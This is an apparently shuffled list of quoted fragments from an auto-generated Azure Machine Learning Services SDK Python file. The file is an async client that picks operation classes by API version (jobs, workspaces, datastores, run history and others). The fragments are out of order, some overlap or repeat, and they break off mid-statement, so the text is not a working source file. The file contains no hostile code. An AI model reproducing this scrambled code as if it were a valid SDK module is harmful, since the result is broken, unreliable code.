":class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations", "group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on", "credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type subscription_id: str", "version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>`", "on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>`", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version =", "2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if", "= self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif", "@property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version", "* 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version ==", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version:", "..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations", "import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as", "operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends", "raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config,", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version", "does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version))", "API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "{} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview':", "the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\"", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else:", "..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass", "group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on", "from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config,", "import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the", "def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version", "* 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "you should stick to a particular api-version and/or profile. The profile sets a", "API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01:", "raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif", "* 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version", "import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does", "await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details):", "data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version =", "raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client,", "else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client,", "import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as", "else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client,", "does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':", "'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version", "2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01:", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01':", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from", "..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise", "def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version", "KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version))", "else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client,", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version))", "}}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str,", "production, you should stick to a particular api-version and/or profile. The profile sets", "API version to use if no profile is provided, or if missing in", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API", "ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends", "..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client,", "version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from", "have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance", "PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass", "v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events')", "import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class", "version to use if no profile is provided, or if missing in profile.", "not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self):", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations", "operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from", ":class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations", "on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>`", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` *", "import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", ":param api_version: API version to use if no profile is provided, or if", "raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance", "from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise", "..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations", "raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "* v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations", "WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have", "component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>`", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version:", "Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>`", "* 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\"", "the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` *", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>`", "version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version =", "self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version", "\"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return", "from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version", "definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting", "not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self):", "else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client,", "'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the", "operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends", "== '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif", "Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass", "version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01:", "sets a mapping between an operation group and its API version. The api-version", "import models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` *", "a mapping between an operation group and its API version. The api-version parameter", "group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on", "version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance", ":class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations", "MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass", "'2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does", "APIs allow end users to operate on Azure Machine Learning Workspace resources. This", "self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise", "2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass", "from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config,", "PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>`", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return", "Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>`", "'1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations", "* 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs')", "import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as", "batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>`", "'1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0',", "ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "{} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "root for # license information. # # Code generated by Microsoft (R) AutoRest", "migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version =", "OperationClass else: raise 